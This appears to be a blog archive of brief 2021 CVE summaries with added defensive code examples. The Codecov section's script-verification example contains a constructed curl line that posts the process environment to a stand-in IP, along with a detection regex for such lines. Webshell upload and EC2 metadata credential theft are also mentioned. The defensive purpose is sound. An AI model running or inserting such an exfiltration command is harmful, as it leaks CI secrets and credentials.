Category Archives: Potential Risk of CVE

Citrix Workspace App (CVE-2021-22907) Security Update – 11th May 2021

Preface: The Improper Access Control weakness describes a case where software fails to restrict access to an object properly.

Background: Citrix Workspace ensures corporate data is safe and malicious activities are spotted quickly. If the installation is user-based, Citrix Workspace app must be installed for each user who logs on to the local machine.

Vulnerability details: Citrix has released security updates to address a vulnerability in Citrix Workspace App for Windows. An attacker could exploit this vulnerability to take control of an affected system. This vulnerability affects all supported versions of Citrix Workspace app for Windows but does not affect Citrix Workspace app on any other platforms. The vendor has not stated explicitly what the actual flaw is, so it is unclear whether this is a recurrence of an earlier design weakness (refer to the diagram for details).

Official announcement: CTX307794 (Citrix Workspace App Security Update) – https://support.citrix.com/article/CTX307794

CVE-2021-20326: Performing a specific type of find query in MongoDB may trigger a denial of service – 10th May 2021

Preface: The term ‘NoSQL’ means ‘non-relational’: MongoDB is not based on the table structure of a relational database.

Background: MongoDB’s storage format is called BSON, which is similar to JSON. A traditional database stores data in tabular format; MongoDB instead uses collections of documents rather than tables of rows to organize and store data. A collection holds documents, and a document has fields and values, as in JSON. Field types include scalar types (string, number, date, etc.) and composite types (arrays and objects). Query operations on array fields use the db.collection.find() method in the mongo shell. MongoDB also supports query operations on geospatial data, which can be stored as GeoJSON objects or as legacy coordinate pairs.

Vulnerability details: A user authorized to perform a specific type of find query may trigger a denial of service. This issue affects MongoDB Inc. MongoDB Server v4.4 versions prior to 4.4.4. For more details, please refer to the diagram attached.

Remedy: Add stricter parser checks around positional projection
Branch: v4.4 – https://github.com/mongodb/mongo/commit/0c7f643a2dfe4000ac9630ed5dace0cb40ec9740
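The fix above tightens the server's parser around positional projection. An application can refuse malformed projections before they ever reach the server. The following is an added example written for this post, not MongoDB server code and not the commit linked above. Assumption: the rules it enforces are MongoDB's documented constraints on the positional "$" projection operator (at most one per query, "$" must be the last component of the field path such as "grades.$", and the array field must also appear in the query filter); the page does not say which malformed input triggered the denial of service.

```python
"""Application-side guard for user-supplied find() projections.

Added example, not MongoDB server code and not the fix referenced above.
Assumption: the rules enforced here are MongoDB's documented constraints on
the positional "$" projection operator: at most one per query, "$" must be
the last component of the field path (e.g. "grades.$"), and the array field
it refers to must also appear in the query filter. Rejecting a projection
that breaks these rules in the application keeps malformed input from ever
reaching the server's projection parser.
"""


class ProjectionError(ValueError):
    """Raised when a projection document violates the positional-$ rules."""


def _filter_fields(query: dict) -> set:
    """Collect field paths referenced by a filter, descending into
    $and/$or/$nor so "grades" is found inside {"$or": [{"grades": 80}]}."""
    fields = set()
    for key, value in query.items():
        if key in ("$and", "$or", "$nor") and isinstance(value, list):
            for sub in value:
                if isinstance(sub, dict):
                    fields |= _filter_fields(sub)
        elif not key.startswith("$"):
            fields.add(key)
    return fields


def validate_positional_projection(query: dict, projection: dict) -> dict:
    """Return the projection unchanged if well-formed, else raise ProjectionError."""
    positional = [
        k for k in projection
        if k == "$" or k.startswith("$.") or k.endswith(".$") or ".$." in k
    ]
    if len(positional) > 1:
        raise ProjectionError("only one positional $ projection is allowed")
    for path in positional:
        parts = path.split(".")
        # "$" alone, "$.x", "a.$.b" and "a.$.$" are all malformed.
        if len(parts) < 2 or parts[-1] != "$" or "$" in parts[:-1]:
            raise ProjectionError(f"positional $ must end the field path once: {path!r}")
        array_field = ".".join(parts[:-1])
        queried = _filter_fields(query)
        # A filter on "grades" or on a sub-path such as "grades.score" both qualify.
        if not any(f == array_field or f.startswith(array_field + ".") for f in queried):
            raise ProjectionError(f"array field {array_field!r} is not in the query filter")
    return projection


def is_well_formed(query: dict, projection: dict) -> bool:
    """Boolean wrapper for callers that only need an accept/reject decision."""
    try:
        validate_positional_projection(query, projection)
        return True
    except ProjectionError:
        return False


if __name__ == "__main__":
    # Constructed sample inputs: one valid projection and one that is rejected.
    print(is_well_formed({"grades": {"$gte": 85}}, {"grades.$": 1}))   # True
    print(is_well_formed({}, {"grades.$": 1}))                          # False
```

Call validate_positional_projection() on the query and projection a request handler assembles from user input, and pass both to find() only when it returns; a ProjectionError maps naturally to an HTTP 400 response.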

VMware vRealize Business for Cloud updates address a remote code execution vulnerability (CVE-2021-21984) – 5th May 2021

Preface: vSphere 6.5 – introduction of several new REST APIs included in the vCenter Server Appliance (VCSA).

Background: You can use vRealize Business for Cloud to manage the following VMware products and services through the REST API: vCenter Server, vCloud Director, vRealize Automation and vRealize Operations Manager. To access the VCSA appliance, the API endpoints for available updates are under the [/]rest[/]appliance[/]update section. If you run the API explorer, you will get the following result: the endpoint shows UP_TO_DATE, while VAMI shows 5 available updates.

Vulnerability details: Attackers can exploit this security flaw using the management interface (VAMI) upgrade APIs to gain access to unpatched vRealize Business for Cloud Virtual Appliances.

Remedy – Official announcement : https://www.vmware.com/security/advisories/VMSA-2021-0007.html

Dell patches 12-year-old driver vulnerability impacting millions of PCs – 5th May 2021

Background: DBUtil_2_3.sys is a Windows driver. A driver is a small software program that allows your computer to communicate with hardware or connected devices. This means that a driver has direct access to the internals of the operating system, hardware, etc.

Vulnerability details: The Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required. According to Dell, the vendor plans to release proof-of-concept code for CVE-2021-21551 on 1st June 2021. But we can speculate about the flaw before that update is announced. For details, please refer to the diagram.

Official announcement: https://www.dell.com/support/kbdoc/zh-hk/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability

In normal circumstances, the IT team will prevent people from scanning their site. Perhaps sometimes this check is skipped by a careless mistake – 4th May 2021

Preface: US Homeland Security urges computer users in the country to stay alert to multiple vulnerabilities in Pulse Secure products. Perhaps the whole world should be aware of it.

Synopsis: Pulse Secure acquired Juniper’s SSL VPN product a few years ago. Perhaps we can remember that Juniper is an active player among telecommunications service providers. Around the world, including enterprise firms, customers are satisfied with the Juniper SSL VPN service.

Security focus: Products affected by the vulnerabilities (PCS 9.1Rx and 9.0Rx)
CVE-2021-22894 – Buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows remote authenticated users to execute arbitrary code as the root user via a maliciously crafted meeting room.
CVE-2021-22899 – allows remote authenticated users to perform remote code execution via Windows File Resource Profiles.
CVE-2021-22900 – allows an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.

For details, please refer to the link: https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/

Samba Releases Security Updates – 30th Apr 2021

Technical background: A Samba file server enables file sharing across different operating systems over a network. It lets you access your desktop files from a laptop and share files with Windows and macOS users.

Vulnerability details: Unprivileged users can delete files in network shares that they shouldn’t be able to access.
However, the vendor stated that they have analysed the code paths but have not yet confirmed a specific way for a remote user to trigger this flaw reproducibly.
Perhaps you may have luck finding the root cause. For more details, please refer to the attached diagram.

Official details (CVE-2021-20254: Fixed a buffer overrun in sids_to_unixids()): https://www.samba.org/samba/security/CVE-2021-20254.html

Protecting an unpatched Samba server: The easiest way is to use the “hosts allow” and “hosts deny” options in the Samba configuration file [smb.conf] to allow access to your server only from a specific range of hosts. An example is shown below:

hosts allow = 127.0.0.1 192.168.2.0/24 192.168.3.0/24
hosts deny = 0.0.0.0/0
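To see what the two lines above actually do for a given client, the following added example (written for this post, not Samba's own code) evaluates a client address against a "hosts allow" / "hosts deny" pair. It models only the address forms used in the configuration above (single IPs and CIDR networks); Samba also accepts hostnames, netgroups, "ALL" and "EXCEPT", which are deliberately left out. The precedence rules follow the smb.conf manual: loopback is always admitted; with only "hosts allow" set, only listed hosts get in; with only "hosts deny" set, everyone not listed gets in; with both set, a host on the allow list is admitted even if it also matches the deny list, a host only on the deny list is refused, and a host on neither is admitted. That last rule is why the post pairs the allow list with "hosts deny = 0.0.0.0/0": without it, an unlisted host would still be admitted.

```python
"""Evaluate a client address against smb.conf "hosts allow" / "hosts deny".

Added example, not Samba's own code. Handles single IPs and CIDR networks
only (hostnames, netgroups, ALL and EXCEPT are not modelled). Precedence
follows the smb.conf manual as summarised in the lead-in.
"""
import ipaddress


def parse_host_list(value: str):
    """Turn "127.0.0.1 192.168.2.0/24" into a list of ip_network objects."""
    return [ipaddress.ip_network(token, strict=False) for token in value.split()]


def _listed(client_ip: str, nets) -> bool:
    """True if the client address falls inside any network in the list."""
    ip = ipaddress.ip_address(client_ip)
    return any(ip.version == net.version and ip in net for net in nets)


def client_allowed(client_ip: str, hosts_allow: str = "", hosts_deny: str = "") -> bool:
    """Return True if Samba would admit client_ip under these two settings."""
    if ipaddress.ip_address(client_ip).is_loopback:
        return True                       # loopback is always admitted
    allow = parse_host_list(hosts_allow)
    deny = parse_host_list(hosts_deny)
    if not allow and not deny:
        return True                       # no lists at all: open to everyone
    if allow and not deny:
        return _listed(client_ip, allow)  # allow list alone is a whitelist
    if deny and not allow:
        return not _listed(client_ip, deny)  # deny list alone is a blacklist
    if _listed(client_ip, allow):         # both set: allow wins over deny
        return True
    if _listed(client_ip, deny):
        return False
    return True                           # on neither list: admitted


# The policy from the post: the two LAN ranges in, everything else out.
HOSTS_ALLOW = "127.0.0.1 192.168.2.0/24 192.168.3.0/24"
HOSTS_DENY = "0.0.0.0/0"

if __name__ == "__main__":
    # Constructed sample clients to exercise the policy.
    for ip in ("192.168.2.10", "192.168.3.200", "10.0.0.5", "127.0.0.1"):
        verdict = "allowed" if client_allowed(ip, HOSTS_ALLOW, HOSTS_DENY) else "denied"
        print(f"{ip:>14}  {verdict}")
```

Note that "hosts deny = 0.0.0.0/0" only covers IPv4; a server that also listens on IPv6 needs "::/0" in the deny list as well, otherwise an unlisted IPv6 client falls through to the "on neither list" case and is admitted.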

CISA urges the public to be aware of the Codecov software vulnerability – 30th Apr, 2021

Preface: CISA is aware of a compromise of the Codecov software supply chain in which a malicious threat actor made unauthorized alterations of Codecov’s Bash Uploader script, beginning on January 31, 2021.

Background: A supply chain attack went undetected for two months. Codecov has over 29,000 enterprise customers, including well-known names like Atlassian, Washington Post, GoDaddy, Royal Bank of Canada, and Procter & Gamble.

Vulnerability details: Through its investigation of this cyber security incident, the vendor now has additional information concerning which environment variables may have been obtained without authorization and how they may have been used. The issue occurred due to an error in Codecov’s Docker image creation process that enabled the actors to extract sensitive credentials and modify the Bash Uploader script, which in turn let the attacker exfiltrate sensitive information. For more details, please refer to the link – https://about.codecov.io/security-update/
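A CI pipeline that fetches an uploader script at run time has two cheap defences against a modified script: pin the script's SHA-256 and refuse to execute anything that does not match, and scan the fetched text for lines that ship the environment to a remote host before running it. The following is an added example written for this post, not Codecov's tooling; the script text and the appended exfiltration line are constructed stand-ins, not the real uploader or the real injected line.

```python
"""Verify a fetched CI script before executing it (added example).

Not Codecov's tooling. Two controls: an exact SHA-256 pin, and a heuristic
scan for curl/wget lines whose arguments expand `env`/`printenv`. The
scripts below are constructed for the example.
"""
import hashlib
import hmac
import re

# Constructed stand-in for a CI upload script the pipeline fetches at run time.
GOOD_SCRIPT = b"""#!/usr/bin/env bash
set -e
curl -s -X POST --data-binary @coverage.xml https://codecov.example/upload
"""

# The same script with a constructed line appended that posts the process
# environment (where CI secrets usually live) to an unrelated host.
TAMPERED_SCRIPT = GOOD_SCRIPT + b'curl -s -d "$(env)" http://203.0.113.7/collect || true\n'

# Heuristic: a curl or wget invocation whose arguments expand env/printenv.
_EXFIL_RE = re.compile(r"\b(curl|wget)\b.*\$\((env|printenv)\)")


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the script bytes; the value to pin in pipeline config."""
    return hashlib.sha256(data).hexdigest()


def script_is_trusted(script: bytes, pinned_sha256: str) -> bool:
    """True only if the script's digest matches the pinned value exactly."""
    return hmac.compare_digest(sha256_hex(script), pinned_sha256.lower())


def suspicious_lines(script: bytes):
    """Return (line_number, text) for lines that send environment contents out."""
    hits = []
    text = script.decode("utf-8", "replace")
    for number, line in enumerate(text.splitlines(), start=1):
        if _EXFIL_RE.search(line):
            hits.append((number, line.strip()))
    return hits


def should_execute(script: bytes, pinned_sha256: str) -> bool:
    """Gate used by the pipeline: both checks must pass."""
    return script_is_trusted(script, pinned_sha256) and not suspicious_lines(script)


if __name__ == "__main__":
    pinned = sha256_hex(GOOD_SCRIPT)   # in practice stored in the pipeline config
    print("good script executes:    ", should_execute(GOOD_SCRIPT, pinned))
    print("tampered script executes:", should_execute(TAMPERED_SCRIPT, pinned))
    for number, line in suspicious_lines(TAMPERED_SCRIPT):
        print(f"  line {number}: {line}")
```

The hash pin is the control that actually blocks a modified script; the line scan is a second, weaker signal that still helps when the pin has been left unset or updated carelessly, because it flags the exfiltration pattern regardless of what else changed.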

Another wave of IoT vulnerability storm – CISA releases ICS advisory on RTOS vulnerabilities – 29th Apr 2021

Preface: People say that when you walk through rough roads, a brand new road is waiting for you.

Synopsis: Due to the small size of IoT devices, the main component chips integrate memory, storage and even the WiFi function. Technically, the hardware resembles a car, and the software (OS) is equivalent to the car’s driver. If the driver is healthy, the entire journey will be smoother. An RTOS is a key component of an IoT device platform. A reinvented RTOS for IoT needs to support industry-leading communications standards and protocols such as CAN, Bluetooth, Continua, ZigBee, Wi-Fi, and Ethernet, and deliver high-performance networking capabilities out of the box.

Security Focus: A simple way to describe integer overflow: if 2147483647 is stored in an int variable (a 32-bit signed integer), adding one makes it wrap around to -2147483648. This is an example of integer overflow.

Status: Several RTOS platforms have encountered integer overflow vulnerabilities, so CISA released an ICS advisory on real-time operating system vulnerabilities. An integer overflow combined with a software programming mistake amplifies the risk level; in the worst case it lets an attacker achieve remote code execution.
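The following added example (written for this post, not code from any RTOS named in the advisory) reproduces the wrap-around from the Security Focus paragraph and shows the step that turns it into a memory-safety bug: a length computed as count times element size wraps to a small number, a small buffer is allocated, and the later copy of all the elements overruns it. Python integers never overflow, so the helpers mask results to 32 bits the way C arithmetic on int and uint32_t would; the allocation-size functions are a toy model of the length arithmetic an allocator or protocol parser does, not any specific RTOS API (that is an assumption of the example).

```python
"""Emulate 32-bit integer wrap-around and the allocation bug it enables.

Added example, not code from any RTOS. Python ints are unbounded, so the
helpers mask to 32 bits to mimic C; the allocation-size functions are a
toy stand-in for real allocator arithmetic (assumption).
"""

INT32_MAX = 2**31 - 1
UINT32_MAX = 2**32 - 1


def wrap_int32(value: int) -> int:
    """Wrap into the signed 32-bit range: 2147483647 + 1 -> -2147483648."""
    value &= UINT32_MAX
    return value - 2**32 if value > INT32_MAX else value


def wrap_uint32(value: int) -> int:
    """Wrap into the unsigned 32-bit range (what a uint32_t multiply does)."""
    return value & UINT32_MAX


def unchecked_alloc_size(count: int, elem_size: int) -> int:
    """count * elem_size with no overflow check.

    A huge element count wraps to a small product, so the buffer that gets
    allocated is far smaller than the data later copied into it."""
    return wrap_uint32(count * elem_size)


def checked_alloc_size(count: int, elem_size: int):
    """The hardened form: refuse the request if the product cannot fit in
    32 bits. Division, not multiplication, so the check itself cannot wrap."""
    if count < 0 or elem_size < 0:
        return None
    if elem_size and count > UINT32_MAX // elem_size:
        return None
    return count * elem_size


def copy_overruns(count: int, elem_size: int) -> bool:
    """True if copying `count` elements into the unchecked buffer overruns it."""
    return count * elem_size > unchecked_alloc_size(count, elem_size)


if __name__ == "__main__":
    print(wrap_int32(2147483647 + 1))            # -2147483648, as in the post
    count, elem = 0x40000001, 4                  # constructed attacker-chosen count
    print(hex(unchecked_alloc_size(count, elem)))  # 0x4: a 4-byte buffer
    print(copy_overruns(count, elem))            # True: 4 GiB copied into 4 bytes
    print(checked_alloc_size(count, elem))       # None: request refused
```

The check in checked_alloc_size divides rather than multiplies so that the guard itself cannot overflow; the same pattern is what compiler builtins such as __builtin_mul_overflow provide in C, and it is the shape of fix these advisories usually call for.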

Official announcement: Refer link – https://us-cert.cisa.gov/ics/advisories/icsa-21-119-04

Are you a victim of this newly discovered vulnerability (CVE-2021-25216)? – 28th Apr, 2021

Preface: BIND is the most commonly used DNS software on the Internet today. DNS servers that use BIND as server software account for about 90% of all DNS servers. BIND is now developed and maintained by the ISC (Internet Systems Consortium).

Background: The ISC BIND server contained the vulnerable code within the Simple and Protected GSSAPI Negotiation Mechanism (SPNEGO) component, but ISC did not merge the patch at that time. After 15 years, ISC patched the bug in BIND and assigned it CVE-2020-8625. However, a second new vulnerability has now appeared in BIND. It is CVE-2021-25216.

Vulnerability details: The details of this vulnerability are very complicated. Please refer to the official announcement – https://kb.isc.org/docs/cve-2021-25216

Ref: GSS-TSIG (Generic Security Service Algorithm for Secret Key Transaction) is an extension to the TSIG DNS authentication protocol for secure key exchange. It is a GSS-API algorithm that uses Kerberos to pass security tokens, providing authentication, integrity and confidentiality.
GSS-TSIG uses TKEY records for key exchange between the DNS client and server in GSS-TSIG mode, and for authentication between the DNS client and Active Directory.

CVE-2021-29200 – Apache OFBiz has unsafe deserialization prior to version 17.12.07; an unauthenticated user can perform an RCE attack (27th Apr 2021)

Preface: According to market statistics, 152 companies use Apache OFBiz. The companies using Apache OFBiz are most often found in the United States and in the computer software industry.

Background: Apache OFBiz is a suite of business applications flexible enough to be used across any industry. OFBiz is an open source enterprise resource planning (ERP) system. A common architecture allows developers to easily extend or enhance it to create custom features.

Vulnerability focus: Experts found a lack of file extension checks at catalog/control, which allows uploading a webshell JSP script. Meanwhile, if the vulnerable system runs on top of Amazon Elastic Compute Cloud, it can retrieve user credentials due to the AWS design principle.
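The missing control in the paragraph above is a file-extension check on uploads. The following is an added example written for this post, not OFBiz code, showing the hardened form of such a check: accept only an explicit allow-list of extensions, reject every extension component that a servlet container or template engine might execute (so "shell.jsp.png" is caught, not just "shell.jsp"), and strip any path component so a name like "../shell.jsp" cannot escape the upload folder. The allow-list and block-list contents are assumptions chosen for the example.

```python
"""Allow-list check for uploaded file names (added example, not OFBiz code).

The allow-list and executable-extension list are assumptions for the
example; tune them to what the application actually accepts.
"""

# Extensions the application is willing to store (assumed for the example).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "csv"}
# Extensions a Java servlet container or template engine may execute.
EXECUTABLE_EXTENSIONS = {"jsp", "jspx", "jsf", "war", "jar", "ftl", "groovy"}


def safe_upload_name(filename: str):
    """Return a sanitised base name, or None if the upload must be rejected."""
    # Drop any directory part, whichever separator the client used.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].strip()
    if not base or base in (".", ".."):
        return None
    # Null bytes and control characters have no place in a file name.
    if any(ord(c) < 32 for c in base):
        return None
    # Examine every extension component, not only the last one.
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return None                      # no extension, or a dot-file
    exts = parts[1:]
    if any(ext in EXECUTABLE_EXTENSIONS for ext in exts):
        return None                      # "shell.jsp", "shell.jsp.png", ...
    if exts[-1] not in ALLOWED_EXTENSIONS:
        return None                      # anything outside the allow-list
    return base


if __name__ == "__main__":
    # Constructed sample names: accepted ones return the base name, others None.
    for name in ("report.pdf", "photo.PNG", "shell.jsp", "shell.jsp.png",
                 "../../webapps/ROOT/x.jsp", "notes", "a\x00.jsp"):
        print(f"{name!r:32} -> {safe_upload_name(name)!r}")
```

A name check alone is not a complete defence: store uploads outside any directory the servlet container serves, and never rely on the client-supplied content type. The function here is the gate the vulnerable endpoint lacked; the storage location is the second half.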

Reserved set of security credentials in AWS?

Instance identity – security credentials can be generated using the instance metadata service on every EC2 instance in AWS, even when no role is attached to the instance.

Official announcement: https://issues.apache.org/jira/browse/OFBIZ-12080